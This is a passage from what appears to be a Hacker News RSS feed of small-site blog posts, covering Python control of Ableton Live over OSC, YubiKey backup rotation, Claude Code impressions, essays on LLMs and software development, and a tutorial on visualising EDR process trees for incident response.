    1. Define a Markov Chain: The code makes a dictionary that is the Markov chain. The keys are the current notes, and the values are lists of notes that could come next.
    2. Generate a Sequence: Starting with a note, the code picks the next note randomly from the list of possible notes in the Markov chain. Repeat, and you’ve got a sequence!
    3. Send MIDI Notes: The generated notes get beamed to Ableton Live using that send_notes function we made earlier.

    Tweak the training data and Markov chain settings, and you can churn out all sorts of melodies.

    OSC Interface with Ableton Live

    To send OSC to Ableton, you’ll need to install and enable third-party remote scripts. Check out the details here: https://help.ableton.com/hc/en-us/articles/209072009-Installing-third-party-remote-scripts. An absolute legend has already built a remote script that provides an Open Sound Control (OSC) interface to control Ableton Live called AbletonOSC. Once you’ve done that, select “AbletonOSC” under the Control Surface dropdown in Preferences > Link / Tempo / MIDI.

    AbletonOSC listens for OSC messages on port 11000 and sends replies on port 11001. Replies go back to the same IP address that sent the message. When you’re asking for properties, you can use OSC wildcard patterns. For example, /live/clip/get/* 0 0 will grab all the properties of track 0, clip 0.

    Now you can send OSC commands to boss Ableton around! This basic script sets the tempo, makes a clip, adds notes, and fires it up. The commented-out part pauses all the playing clips.

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    
    from pythonosc.udp_client import SimpleUDPClient
    
    ip = "127.0.0.1"
    to_ableton = 11000
    from_ableton = 11001
    client = SimpleUDPClient(ip, to_ableton)
    
    # Set tempo
    client.send_message("/live/song/set/tempo", [140])
    
    # Create clip
    client.send_message("/live/clip_slot/create_clip", (0, 0, 4))
    
    # Send notes
    client.send_message("/live/clip/add/notes", (0, 0,
                                                    60, 0.0, 0.25, 64, False,
                                                    67, -0.25, 0.5, 32, False))
    client.send_message("/live/clip/add/notes", (0, 0,
                                                    72, 0.0, 0.25, 64, False,
                                                    60, 3.0, 0.5, 32, False))
    
    # Fire up the clip
    client.send_message("/live/clip/fire", (0, 0))
    
    # # Stop the clips
    # client.send_message("/live/song/stop_all_clips", None)
    

    With these MIDI and OSC scripts, I’ve been able to set up tracks in Live that are fully controlled with code and can be tweaked on the fly by sending OSC signals.



    ]]>
    https://sangarshanan.com/2025/02/25/connecting-python-with-ableton/ hacker-news-small-sites-43209412 Fri, 28 Feb 2025 19:35:30 GMT
    <![CDATA[Virtual museum of socialist era graphic design in Bulgaria]]> thread link) | @NaOH
    February 28, 2025 | http://socmus.com/en/ | archive.org

    Unable to extract article]]>
    http://socmus.com/en/ hacker-news-small-sites-43209046 Fri, 28 Feb 2025 18:58:13 GMT
    <![CDATA[Backup Yubikey Strategy]]> thread link) | @ericdiao
    February 28, 2025 | https://fy.blackhats.net.au/blog/2025-02-28-backup-yubikey-strategy/ | archive.org

    After a local security meetup where I presented about Webauthn, I had a really interesting chat with a member about a possible Yubikey management strategy.

    Normally when you purchase a yubikey it's recommended that you buy two of them - one primary and one backup. But how do you keep them in sync? You have to ensure every key you enroll on the primary is also on the backup!

    This means you tend to have your secondary key nearby - not so great for backups/disaster management.

    When we start to look at a business, they'll want to consider something a bit more robust like a '3 2 1' esque strategy (3 copies, 2 different physical media, 1 copy off site).

    Given these are yubikeys, we can't really do the 2 different physical media (especially as no other key maker even comes close to yubikeys quality and security). But we can consider the 3 and 1 parts.

    We can easily have 3 yubikeys and 1 offsite. But now the maintenance of keeping all these updated is much harder. How do we take care of this?

    Rotate the keys - on a schedule, the keys should be swapped in place (similar to industrial pumps with lead, lag, and reserve). We have a lead key that's used daily, the lag key which is the backup onsite, and the reserve which is offsite. Then we periodically rotate them so that the lead becomes the lag, the lag becomes the reserve (and offsite), and the reserve is moved onsite as the lead key. This allows the lead key (former reserve key) to quickly be identified for missing any credentials, and the lag key can be used to authorise the lead key to enroll anything that it was missing.

    I don't think this process is perfect - there is obviously a delay between a new account enrollment and it being on all three keys. This delay is going to be based on the rotation period. There is still also a risk that infrequently used accounts may be missed on one of the three keys, which can require some discipline to ensure that all credentials are periodically tested and verified as operational.

    I think this is a really interesting suggestion and has some promise, but I'd be keen to hear of other thoughts on the matter - or better ways to manage this. I certainly don't think this approach is for everyone either, but I can see a lot of places it would be quite valuable.

    ]]>
    https://fy.blackhats.net.au/blog/2025-02-28-backup-yubikey-strategy/ hacker-news-small-sites-43208914 Fri, 28 Feb 2025 18:42:43 GMT
    <![CDATA[Claude Code Initial Impressions]]> thread link) | @ingve
    February 28, 2025 | https://davidjarman.net/archive/2025/02/24/claude-code-initial-impressions | archive.org

    Claude Code Announcement

    Claude announced a new hybrid reasoning model today. That's a great idea to have a singular model for both reasoning and quick responses.

    What I'm more interested in is their new Claude Code tool. It's an interactive CLI that is similar to GitHub Copilot or Cursor, but only runs in your terminal as of now. Here is the link for setting it up: https://docs.anthropic.com/en/docs/agents-and-tools/claude-code/overview

    I was hoping that this tool would just use my existing Claude plan, but no, of course you actually pay for the tokens it uses. I'm sure this was a very conscious decision, as this tool uses A LOT of tokens right now. I mean, it's breathtaking. The first thing I did was load it up on my link blog codebase, and ran the /init command to generate a readme file for the codebase. I immediately ran the /cost command to see how much that operation costed. Thirty cents. That may not sound like much, but for as small as my codebase is, I was expecting that to only be a few cents. I then gave it a very specific task to add validation to my admin post authoring form. I gave it a fair bit of instruction, as the docs recommends treating the tool like a software engineer that you would delegate a task to. So I gave it hints as to how to find validation rules and all that. I then sent it off. It ran for something like 2 minutes making the change. It prompted me for permission to perform tool actions (e.g. run some bash commands, run build, etc). After a total of 10 minutes of use, I was up to $1.50 in spend, the code did not build, and I realized that the tool call to build the code was broken. Edit: It turns out powershell is not officially supported yet. You must use bash or zsh to launch claude.

    I'm still excited about this tool and will keep playing around with it. I'll probably have to reload my anthropic wallet with more credits soon as it is expensive, but so far it seems like a really cool concept, and I hope they keep improving it and driving down the cost.

    ]]>
    https://davidjarman.net/archive/2025/02/24/claude-code-initial-impressions hacker-news-small-sites-43208892 Fri, 28 Feb 2025 18:39:48 GMT
    <![CDATA[(We) don't use LLMs for writing]]> thread link) | @bredfield
    February 28, 2025 | https://www.madebybread.com/writing/don%27t-use-llms-for-writing | archive.org

    All of our internal (values, playbook, proposals) and external (blog posts, product + architecture specs, emails, proposals) writing is generated the old fashioned way: bashing your fingers (and sometimes head, as it feels like) across a keyboard. It's not because LLMs aren't capable, but because writing is a fundamental form of thinking.

    Given a personal data set, well-crafted prompt, and agentic "peer review" feedback loop, LLMs can match tone and craft logical arguments exceptionally well. The process:

    1. Have an idea
    2. Prompt the LLM to write
    3. Tune / refactor prompt
    4. Copy pasta
    5. Profit

    While the output of this can be (jarringly) good, that’s not the point. What's missed is critical - friction. And in this case, friction drives understanding, discovery, and humility.

    Understanding

    You know the feeling - you’ve just read a book, go to explain a core concept for the first time to someone, and you quickly realize that you don’t understand it as much as you thought you did. This is partly due to the generation effect, which states that work generated from your own mind is both understood and remembered better than if it's purely read from a source.

    Writing is the best way to uncover gaps in your understanding of a topic. Forcing yourself to synthesize through your own words will quickly expose cracks in the facade of your grip on a subject. Feynman demonstrated this through teaching - the ability to take something complex and distill it down to it's atomic and simple components. Writing is a vehicle to teach yourself, in that same capacity.

    Also important is the muscle of filtering signal from noise. Writing forces us to take multiple sources (be it literature, shower thoughts, conversations, etc.) and bundle up insight into simple, compact reasoning. This is painful, but drives deeper understanding.

    Discovery

    Writing forces you to make connections between ideas that are floating around in your brain. Your lived context, thoughts, opinions, and understanding form an ecosystem where ideas can collide and form novel connections. The process of writing slows us down, probes these connections, and helps facilitate those collisions (see: Where Good Ideas Come From).

    LLMs force a flow from thesis -> argument. In reality, good writing and novel ideas come from the inverse. Connecting the dots between ideas through writing can surface novel and often surprising opinions that often deviate from an original thesis.

    By their nature, LLMs statistically will converge arguments to their most popular representation. This goes against the human “milleau” of outlier connections, ideas, and representations. As the majority of published writing shifts from human to AI, the human element of taste and weirdness will be what sets writing apart from the crowd.

    Humility

    There's a pervasive cognitive bias where limited understanding / competence leads to an overestimation of ability (The Dunning-Kruger Effect). Put another way - understanding breeds humility. And humility is essential to working together as humans.

    By skipping out on writing, we're collectively generating false-earned confidence.


    AI has dizzying, industry-shifting applications - which we use extensively to help build products and companies. We're just careful to apply it to areas where friction isn't a lever. Creative reasoning and weird, novel ideas are pretty important in a world where execution is cheap.

    ]]>
    https://www.madebybread.com/writing/don%27t-use-llms-for-writing hacker-news-small-sites-43208827 Fri, 28 Feb 2025 18:32:49 GMT
    <![CDATA[Visualizing process trees with marimo and anywidget]]> thread link) | @akshayka
    February 28, 2025 | https://blog.cauchy.org/blog/anywidget/ | archive.org

    This work was inspired by a project at DNB’s Cyber Defense Center where we have been exploring the use of visualizations and data apps to help us do incident response more efficiently. The process tree visualization presented here re-envisions those data apps within the notebook environment, demonstrating how similar interactive analysis capabilities can be achieved in computational notebooks. While this specific implementation focuses on teaching core concepts, we hope to share more about our production security visualization work in future posts or presentations.

    Process creation event logs are one of the primary data sources when investigating security incidents. However, when treated as a collection of events, we are left with a tabular representation of what is in reality a tree relationship, and it can be difficult for an analyst to get an overview of what is going on. While Microsoft and other EDR vendors provide visualization tools out of the box, they come with some limitations: you can’t customize them, data expires after a while, and they are only available if you pay for premium tiers.

    In this post, we will show how to build an interactive process tree visualization by combining:

    • anywidget - a framework for creating custom Jupyter and marimo notebook widgets
    • marimo - a reactive Python notebook
    • ibis - a Python dataframe library that is backend agnostic
    • Apache Spark & Spark Connect - a distributed query engine
    • dependentree - d3 tree visualization library created by Square

    Below is a diagram showing the overview of the system architecture and how the components relate to eachother.

    events = traitlets.List([]).tag(sync=True)

    events = traitlets.List([]).tag(sync...
    Delta

    anywidget(ProcessTreeWidget(events))

    anywidget(ProcessTreeWidget(ev...
    http://hostname:2718 spark-connect

    process_id = traitlets.Int(-1).tag(sync=True)

    process_id = traitlets.Int(-1).tag(sync=Tr...
    Text is not SVG - cannot display

    Overview of the system architecture and data flow. Users create ibis dataframe queries in a marimo app that are executed on a remote Apache Spark cluster. The process creation events are retrieved, a tree structure is created and sent to the anywidget which renders the d3 process tree visualization.

    We will not dive deep into these tools here, but they all have great documentation and tutorials for those who want to learn more. In particular, for an introduction to anywidget, check out this presentation by the creator Trevor Manz, or watch his step-by-step tutorial on building a fun widget from scratch.

    Process Creation Events

    Even though we will use data from Microsoft Defender for Endpoint, the approach can be adapted to logs from any EDR. The MDE process creation events are stored in the DeviceProcessEvents schema. For the process tree use-case the important fields are summarized below.


    Field Description
    Timestamp Date and time when the event was recorded
    ReportId Event identifier based on a repeating counter. To identify unique events, this column must be used in conjunction with the DeviceName and Timestamp columns.
    DeviceName Fully qualified domain name (FQDN) of the device
    ProcessId Process ID (PID) of the newly created process
    FileName Name of the file that the recorded action was applied to
    ProcessCreationTime Date and time the process was created
    InitiatingProcessId Process ID (PID) of the process that initiated the event
    InitiatingProcessFileName Name of the process file that initiated the event; if unavailable, the name of the process that initiated the event might be shown instead
    InitiatingProcessCreationTime Date and time when the process that initiated the event was started
    InitiatingProcessParentId Process ID (PID) of the parent process that spawned the process responsible for the event
    InitiatingProcessParentFileName Name of the parent process that spawned the process responsible for the event
    InitiatingProcessParentCreationTime Date and time when the parent of the process responsible for the event was started

    Timestamp
    Date and time when the event was recorded
    ReportId
    Event identifier based on a repeating counter. To identify unique events, this column must be used in conjunction with the DeviceName and Timestamp columns.
    DeviceName
    Fully qualified domain name (FQDN) of the device
    ProcessId
    Process ID (PID) of the newly created process
    FileName
    Name of the file that the recorded action was applied to
    ProcessCreationTime
    Date and time the process was created
    InitiatingProcessId
    Process ID (PID) of the process that initiated the event
    InitiatingProcessFileName
    Name of the process file that initiated the event; if unavailable, the name of the process that initiated the event might be shown instead
    InitiatingProcessCreationTime
    Date and time when the process that initiated the event was started
    InitiatingProcessParentId
    Process ID (PID) of the parent process that spawned the process responsible for the event
    InitiatingProcessParentFileName
    Name of the parent process that spawned the process responsible for the event
    InitiatingProcessParentCreationTime
    Date and time when the parent of the process responsible for the event was started

    To make the widget easier to re-use with different data sources, we will map the DeviceProcessEvents table to the ProcessEvent schema from the ASIM (Advanced Security Information Model). The Azure Sentinel repository contains ASIM parsers for many data sources. While these parsers are written in KQL (Kusto Query Language), it is straightforward to rewrite them as Ibis expressions.

    process_creation_events = (
      events
        .filter(_.ActionType == "ProcessCreated")
        .distinct(
           on=["ReportId", "Timestamp", "DeviceName"], 
           keep="first"
        )
        .order_by(_.Timestamp)
        .mutate(
           TargetProcessId=_.ProcessId,
           TargetProcessFilename=_.FileName,
           TargetProcessCreationTime=_.ProcessCreationTime,
           # ...
        )
    )

    Ibis and Spark Connect

    By using Ibis the same code can run on a remote data system, locally using DuckDB or even in the browser. In a production system, you would typically connect to distributed query engines like Apache Spark, BigQuery or Snowflake.

    Spark Connect allows you to execute Apache Spark queries remotely from a notebook enviroment (or any client). When you run queries from your notebook, the client sends your operations to the Spark server, which executes them and returns the results which are streamed back to the client through gRPC in Arrow format. This client-server architecture lets us run intensive queries on powerful remote clusters while maintaining an interactive notebook experience.

    
    config = Config(profile="security")
    spark = DatabricksSession.builder.sdkConfig(config).getOrCreate()
    
    con = ibis.pyspark.connect(spark)
    device_process_events = (
        con.table(
            name="device_process_events",
            database=("security_logs", "mde"),
        )
        .select(_.properties)
        .unpack("properties")
    )
    
    t = ibis.memtable(device_process_events.to_pyarrow())

    An example of connecting to a remote Spark cluster on Databricks using Ibis and Spark Connect and creating an in-memory table backed by DuckDB. This approach allows remote query execution while maintaining local interactivity, though it’s worth noting that data transfer involves conversion through pandas before reaching DuckDB, so it’s not a zero-copy operation.

    Retrieving the right set of process creation events is an interesting challenge in itself, especially if you don’t have access to the complete start and end of a system session. One approach is to examine a wide time interval of process creation events and look for system boot markers like the Windows kernel (ntoskrnl.exe) being loaded. When investigating a specific process, you can define session boundaries by identifying when ntoskrnl.exe was loaded - the previous load marking the session start and the next load indicating a reboot and new session. While this information is typically available in dedicated system event logs, it can be reconstructed from process creation events with careful querying.

     ntoskrl_creation_events = (
      events
        .filter(_.ParentProcessFilename == "ntoskrnl.exe")
        .select(_.ParentProcessCreationTime)
        .distinct(on="ParentProcessCreationTime", keep="first")
     )

    An example of how to identify system boot events by looking for ntoskrnl.exe as a parent process. While not implemented in our demo, this approach can help establish session boundaries when investigating incidents. In practice, you might simply look back a few hours or days from a suspicious event, or use other time-based filtering approaches depending on your investigation needs.

    For the remainder of this article, we’ll assume you already have a collection of process events (retrieved using Apache Spark, Splunk, Elastic, or some other query or search engine) and are now ready to create a process tree visualization. The techniques we’ll cover work regardless of how you obtained your process event data.

    Building the Tree

    Before we can create visualizations, we need to construct a tree structure from the process creation events. We will use treelib, an efficient tree manipulation library with no external dependencies. The library allows nodes to contain arbitrary data, so we will define a Process.

    class Process(BaseModel):
    
        # Process being created
        target_process_id: int
        target_process_filename: str
        target_process_creation_time: datetime
    
        # Direct parent process
        acting_process_id: int
        acting_process_filename: str
        acting_process_creation_time: datetime
    
        # Grandparent process
        parent_process_id: int
        parent_process_filename: str
        parent_process_creation_time: datetime
    
        def identifier(self) -> str:
            return f"{self.target_process_id}|{self.target_process_creation_time}"
    
        def parent_identifier(self) -> str:
            if self.acting_process_id == Process.MISSING_PROCESS_ID:
                return "<root>"
    
            return f"{self.acting_process_id}|{self.acting_process_creation_time}"
    

    As the root node, we use a placeholder value <root> from which all processes originate. Each process node has a unique identifier created by concatenating its target_process_id and target_process_creation_time values. When adding a node to the tree, we specify both its identifier and its parent’s identifier. The diagram below illustrates a process tree and shows how these fields relate to each other.

    <root> services.exe word.exe cmd.exe pwsh.exe svchost.exe updater.exe rdpclip.exe

    ParentProcessId = ?
    ActingProcessId = ?
    TargetProcessId = 1

    ParentProcessId = ?...

    ParentProcessId = ?
    ActingProcessId = 1
    TargetProcessId = 2

    ParentProcessId = ?...

    ParentProcessId = 1
    ActingProcessId = 2
    TargetProcessId = 3

    ParentProcessId = 1...
    pid: 1 pid: 2 pid: 3

    id=1| 2024-11-01 00:00:42

    id=1|2024-11-01 00:00:42

    id=2| 2024-11-01 00:03:42

    id=2|2024-11-01 00:03:42
    Text is not SVG - cannot display

    An example of a process tree structure created by treelib. Nodes with diagonal stripes represent processes whose creation events were not directly available, but were reconstructed using ActingProcess or ParentProcess information from other events.

    The nodes shown with diagonal stripes (hatched pattern) represent processes where we do not have the original process creation event. This could be because we either did not retrieve the event or because it was not logged by the EDR. However, we can still partially reconstruct these nodes using information from other events - specifically, the ActingProcess or ParentProcess values.

    Next, we define a ProcessTree class that uses treelib to construct our tree structure. When initialized, this class creates a tree with a root node, and provides methods to build out the process hierarchy. The class handles both direct process creation events and reconstructs missing nodes using parent process information.

    class ProcessTree:
        def __init__(self, processes: List | None = None):
            self.tree: Tree = Tree()
            self.root = self.tree.create_node(
                tag="<root>", 
                identifier="<root>", 
                data=None
            )
    
        def insert_or_update(self, process: Process):
            ...
    
        def insert_process(self, process: Process):
            parent_process = Process(
                target_process_id=process.parent_process_id,
                target_process_filename=process.parent_process_filename,
                target_process_creation_time=process.parent_process_creation_time,
            )
    
            ... 
    
            self.insert_or_update(parent_process)
            self.insert_or_update(acting_process)
            self.insert_or_update(process)
    
        def create_dependentree_format(self):
          ...

    The ProcessTree class builds a tree structure from process events, tracking how processes are created and relate to each other. It can handle both direct process creation events and fill in missing information about parent processes, ensuring we have a complete picture of process relationships.

    The create_dependentree_format method (omitted for brevity) transforms the hierarchical process structure into the format required by DependenTree, which is a graph visualization library built using tree layout from D3. The expected format is a list of dictionaries, where each dictionary represents a node (process) in the tree. The only fields required by DependenTree are _name and _deps. However, we want the structure used for the tree also to contain additional fields:


    Field Description
    _name The unique identifier of the process
    _deps A list containing the identifier of the parent processes. In our use-case there is always only one parent so it's a list of one element.
    ProcessName The filename of the process.
    FileName Name of the file that the recorded action was applied to
    ProcessId The process ID.
    ProcessCreationTime The creation time of the process.

    _name
    The unique identifier of the process
    _deps
    A list containing the identifier of the parent processes. In our use-case there is always only one parent so it's a list of one element.
    ProcessName
    The filename of the process.
    FileName
    Name of the file that the recorded action was applied to
    ProcessId
    The process ID.
    ProcessCreationTime
    The creation time of the process.

    With the process tree data structure in place, the next step is creating an interactive widget for computational notebooks. anywidget does two things: it provides the tooling for Jupyter-compatible widget creation and implements the Anywidget Front-End Module (AFM) specification based on standard ECMAScript modules.

    To create the widget’s frontend, we need to write an ES module that defines lifecycle methods, e.g.,

    • initialize: Sets up the widget’s initial state and event listeners
    • render: Handles the actual rendering of the widget in the notebook

    The host platform (like Jupyter or marimo) loads this module and communicates with it through a standardized interface. Here’s the basic structure:

    export default {
      initialize({ model }) {
        // Add instance-specific event listeners
        return () => {
          // Clean up event listeners
        }
      },
      render({ model, el }) {
        // Render the widget
        return () => {
        // Clean up event listeners
        }
      },
    };

    The AFM module defines core widget lifecycle methods for initialization and rendering, each returning cleanup functions. Through synchronized traits, it enables bidirectional Python-JavaScript communication, allowing features like interactive selection and brushing. For details, see reusable widgets for interactive analysis and visualization in computational notebooks.

    For our Process tree visualization widget, we want to maintain a shared tree structure state between Python and JavaScript, with bidirectional synchronization of both the tree and the currently selected node. This means that when a user clicks a node in the visualization, the selection should be reflected in Python, and when we update the tree structure in Python, the widget should re-render the tree visualization. This bidirectional communication is handled through traitlets - we’ll define both an events trait for the tree structure and a process_id trait for tracking the currently selected process.

    For the host side we need to define an anywidget.AnyWidget subclass

    class Widget(anywidget.AnyWidget):
        _esm = pathlib.Path(__file__).parent / "static" / "widget.js"
        events = traitlets.List([]).tag(sync=True)
        process_id = traitlets.int(0).tag(sync=True)

    Process tree widget. The events property is a synchronized list that contains the process tree data. When this list is modified in Python, the changes are automatically reflected in the JavaScript client, triggering a re-render of the visualization. The _esm is the JavaScript side of things.

    For the AFM we need to load and setup the DependenTree, insert it into the DOM and pass it the events list which was generated by the create_dependentree_format method in our ProcessTree class. This connects our Python data structure to the JavaScript visualization.

    // slightly modified version to allow 
    // for node selection and styling
    import DependenTree from "https://esm.sh/gh/kyrre/dependentree@dev"
    
    export default {
    
      render({ model, el }) {
        this.treeDiv = document.createElement("div");
        this.treeDiv.id = "tree";
        this.activePid = null;
    
        // this callback function is called when the events list
        // is changed on the Python side, so we re-create the visualization
        // with the new data
        model.on("change:events", () => {
    
          this.tree.removeTree();
    
          this.tree = new DependenTree(this.treeDiv, options);
          this.tree.addEntities(structuredClone(model.get("events")));
          this.tree.setTree('<root>', 'downstream');
    
        });
    
    
        el.classList.add("process_tree_widget");
        el.appendChild(this.treeDiv);
    
        const options = {
          // ... 
          // settings omitted for brevity
    
          // whenever we click a node in tree we update the 
          // process_id value, which is then synced back to 
          // Python via the process_id traitlet
    
          nodeClick: (node) => {
            model.set("process_id", node.ProcessId);
            model.save_changes();
          }
        };
    
        // the rendering needs to complete before we create the tree
        // via discord :blessed:
        requestAnimationFrame(() => {
          this.tree = new DependenTree(this.treeDiv, options);
          this.tree.addEntities(structuredClone(model.get("events")));
          this.tree.setTree('<root>', 'downstream');
        });
      }
    }

    The process tree visualization AFM implements the widget’s frontend logic. It creates a DOM container for the tree, initializes the DependenTree visualization library, and establishes bidirectional communication with Python. When the shared events state changes (triggered from Python), the “change:events” callback recreates the visualization using the new data. Conversely, when a user clicks a node, the widget updates the process_id value, which synchronizes back to Python, enabling interactive exploration.

    Interactive Demo

    With all the components for our process tree visualization in place, we can now build a notebook that showcases how the widget works in practice, allowing you to:

    1. Filter process events by time range by using a marimo datetime slider
    2. Explore the hierarchical process tree structure
    3. Select individual processes to view their details
    4. See the bidirectional communication between Python and JavaScript in action

    Since marimo notebooks can be run entirely in the browser by using Pyodide (CPython ported to WebAssembly), we can generate a static WASM notebook and embed directly into an iframe. This is great for documentation and for creating examples.

    Note: When running in WebAssembly via Pyodide, we need to handle a few additional setup steps - specifically downloading and installing packages through micropip, and fetching our Parquet data files via HTTP, converting them to Arrow and creating the in-memory dataframe. While this setup code may look a bit involved, most of the complexity is due the workarounds needed to run the demo in a broswer environment. The core visualization functionality remains the same whether you’re running locally or in WebAssembly.

    Below you’ll find an interactive notebook where you can explore the example data. Note that the nodes themselves must be doubleclicked to expand. Opening the notebook in a new tab is recommended to better explore the more deeply nested subtrees. The tree can be seen close to the bottom of the notebook after giving it some time to generate.

    It doesn’t work on mobile so in that case there’s only a video.

    Interactive process tree visualization running entirely in your browser via WebAssembly. This demo showcases the power of bidirectional communication between Python and JavaScript - you can filter the dataset using the time range controls, and clicking on any process node updates the Python state, allowing for detailed inspection of selected processes. The reactive nature of marimo ensures all components stay synchronized as you explore the data.

    It’s also clear from the visualization that the EDR wasn’t able to log all the process relationships, which is why not all processes are properly nested under ntoskrnl.exe. This illustrates the challenge we discussed earlier with the hatched nodes in our tree diagram - some process creation events are missing from the logs, requiring us to reconstruct relationships from parent process information. We recommend exploring the subtree ntoskrnl.exesmss.exewinlogon.exeuserinit.exeexplorer.exe, which shows a user launching a sequence of applications.

    Conclusion

    In this post, we demonstrated how to build an interactive process tree visualization widget using:

    • marimo - a reactive Python notebook environment
    • anywidget and AFM - connecting Python and JavaScript for widget creation
    • DependenTree - creating interactive tree visualizations with d3
    • ibis - a backend-agnostic dataframe library

    By transforming raw process logs into an interactive tree visualization, this widget helps incident responders understand the chain of process executions when investigating security issues. The bidirectional communication between Python and JavaScript enables analysis - analysts can click and interact with nodes in the visualization to select processes of interest, while querying and analyzing the selected process data in Python. This integration between visualization and analysis capabilities helps explore process relationships and examine details when investigating security incidents.

    The solution can work with different EDR data sources by mapping their process events to the ASIM schema, and the visualization can be modified using D3 and other JavaScript libraries or frameworks like React or Vue. Additionally, thanks to Pyodide, the notebook can run directly in the browser via WebAssembly, making it easy to share and demonstrate.

    Future Improvements

    While the current implementation works well for typical process trees, there are some areas for future enhancement:

    • Handling processes with many children: The visualization can become overwhelming when dealing with processes that spawn hundreds of child processes (like services.exe).
    • Timeline filtering: Adding timeline controls would allow users to focus on specific time intervals, making it easier to analyze process relationships during particular periods of interest.
    • Additional context: Incorporating more process metadata and allowing filtering based on process attributes could provide valuable context during investigations.

    The code and documentation for this project is available in our GitHub repository.

    References

    • anywidget - Framework for creating custom Jupyter and marimo notebook widgets
    • marimo - Reactive Python notebook
    • ibis - Python dataframe library
    • Apache Spark - Distributed query engine
    • Spark Connect - Spark’s client-server interface
    • dependentree - D3 tree visualization library
    • treelib - Tree data structure manipulation library
    • Pyodide - Python runtime for the browser
    ]]>
    https://blog.cauchy.org/blog/anywidget/ hacker-news-small-sites-43208696 Fri, 28 Feb 2025 18:20:05 GMT
    <![CDATA[Software Development Is Dead, Long Live Developers]]> thread link) | @mikeflynn
    February 28, 2025 | https://c33tech.com/blog/2025/02/software_development_is_dead_long_live_developers/ | archive.org

    “If you don’t learn to code, in ten years it will be like being illiterate!”

    That was what someone exclaimed on a panel discussion I was on in 2013. It was a talk about bringing technology and entertainment together held in Beverly Hills and hosted by a coding bootcamp company. Two of the people on the panel were from a different bootcamp company, and then there was me, an actual technologist working in entertainment. Surely I would agree that everyone needs to learn to code, right?

    Actually, I’ll disagree a bit with the other panelists on this. Do I think everyone should try coding at some point in their education? Yes. Similar to art, music, and writing, everyone, but especially children, should be exposed to coding to see if they like enjoy it or have a talent for it. But do I think that everyone should be coding all the time? No. Would I equate it to illiteracy? No. Why? Because coding is hard! Sure, you have to learn the programming language syntax, and learn how to run the code and all of the other mechanics of development, but what’s most difficult is the fact that you have to think through problems in a very structured logical way. Not everyone is wired to think like that, in the same way that not everyone can find the beat in a song, or can draw a cat in a way that other people would actually recognize as a cat.

    The good news is, that you don’t need to learn to code to use technology in the same way that you don’t need to know how to take apart a carburetor to drive your car. Technology will come to you as it matures and society accepts it. If you have the interest or a goal to learn how to code or anything technical I strongly encourage you to do the work and hopefully become successful, but you don’t need to do any of that so you can use Facebook or make a spreadsheet in Excel, and that’s not going to change.

    They didn’t invite me back for any more of their panels.

    Here we are now in 2025, over ten years since I sat on that panel and not only do I not get the sense that anyone feels particularly illiterate if they don’t know how to scrape some Python together, the narrative has done a full 180! Don’t bother learning to code! AI will code all the things!

    In a recent interview with Joe Rogan, Meta CEO Mark Zuckerberg said that AI will replace mid-level engineers by 2025. He believes AI can take over coding tasks, allowing human engineers to focus on higher-level problem-solving and creativity. Other tech giants like Google have also started integrating AI in coding processes. While initially costly, companies hope the transition to AI-generated code will become more efficient over time. This shift may reduce the demand for mid-level coding roles, pushing software engineers towards more strategic responsibilities.

    Yet again I’m about to be the another wet blanket. Only the hype has changed.

    Just as I did in 2013, I will start with some common ground. Yes, AI/LLMs are helpful for developers and absolutely can make a developer more efficient. At the moment, I am coding a lot as I am in a Start-Up CTO role, and I use GitHub’s Copilot and have experimented with some of the other models. The experience has been largely quite good. I absolutely see a return on the investment of the $10/month for Copilot plus a few extra dollars in API requests every month. I will also agree that people who can’t code have been able to use LLMs to generate things they wouldn’t have been able to otherwise. Seeing people dream up and create scripts for document automations, Excel macros, or Google Doc scripts is genuinely exciting and potentially a huge gain in productivity for those people. The problem is that none of the things I just mentioned are fully descriptive of what software developers do.

    Developers understand and solve problems. The tech changes all the time, but the problem-solving doesn’t. People used to write assembly code, then higher-level languages came that were more approachable and allowed for more efficient development, but the result wasn’t fewer developers, it was more developers. Way more! Software ate the world, and the process of translating a problem into something that can be solved by new code was an increasingly critical skill. Writing a Python script to reformat a CSV, make a blog, or scrape content off the internet is a great demo, but most developers aren’t making little scripts; they are working on huge advanced systems that integrate into other huge advanced systems. Even if LLMs can someday create perfect code, the requirement to understand the problem enough to describe the solution you need remains a steep climb. Then there’s the matter of distributing the resulting code, which leads to potentially big questions about scale! It goes on and on and on…

    Sexy AI demos from a guy sitting behind a MacBook and talking a little too slowly than you’d prefer make for a fun LinkedIn post filled with emoji, but it’s a far cry from Zuckerberg’s robot developer army he’s pitching to Rogan, and even OpenAI agrees.

    In a new paper, the company’s researchers found that even frontier models, or the most advanced and boundary-pushing AI systems, “are still unable to solve the majority” of coding tasks.

    The researchers used a newly-developed benchmark called SWE-Lancer, built on more than 1,400 software engineering tasks from the freelancer site Upwork. Using the benchmark, OpenAI put three large language models (LLMs) – its own o1 reasoning model and flagship GPT-4o, as well as Anthropic’s Claude 3.5 Sonnet – to the test.

    Specifically, the new benchmark evaluated how well the LLMs performed with two types of tasks from Upwork: individual tasks, which involved resolving bugs and implementing fixes to them, or management tasks that saw the models trying to zoom out and make higher-level decisions. (The models weren’t allowed to access the internet, meaning they couldn’t just crib similar answers that’d been posted online.)

    Though all three LLMs were often able to operate “far faster than a human would,” the paper notes, they also failed to grasp how widespread bugs were or to understand their context, “leading to solutions that are incorrect or insufficiently comprehensive.”

    Yes, the models will continue to advance. Claude 3.7 in particular is making some noise as of this writing, but if you can focus your eyes and see through the hype, this will start to look familiar.

    What a developer has done throughout a given day has been under constant change since the beginning. We’re not punching little holes in carefully ordered cards anymore. We’re not writing machine code by hand anymore, and soon maybe we won’t need to type quite as much as we do today, but none of that was ever really the job. The job of a developer is to understand how things work, diagnose problems, and use the best tools available to solve those problems. That’s not going away.

    Software development as you knew it is dead. It is changing into something else, just like it always has. Long live software development!

    ]]>
    https://c33tech.com/blog/2025/02/software_development_is_dead_long_live_developers/ hacker-news-small-sites-43208668 Fri, 28 Feb 2025 18:17:10 GMT
    <![CDATA["Refactor" Is Not a Scary Word]]> thread link) | @mooreds
    February 28, 2025 | https://kyleshevlin.com/refactor-is-not-a-scary-word/ | archive.org

    “Refactor” is Not a Scary Word

    One thing I’ve struggled with throughout my life is using a word with a specific definition that gets interpreted differently. It causes me a great deal of frustration. It might be unreasonable to expect people to walk around with a Merriam-Webster’s dictionary in their pocket, so mistakes are bound to happen.

    I recently lost a potential client and I’m convinced the reason why is because we had different definitions for a single word: “refactor”.

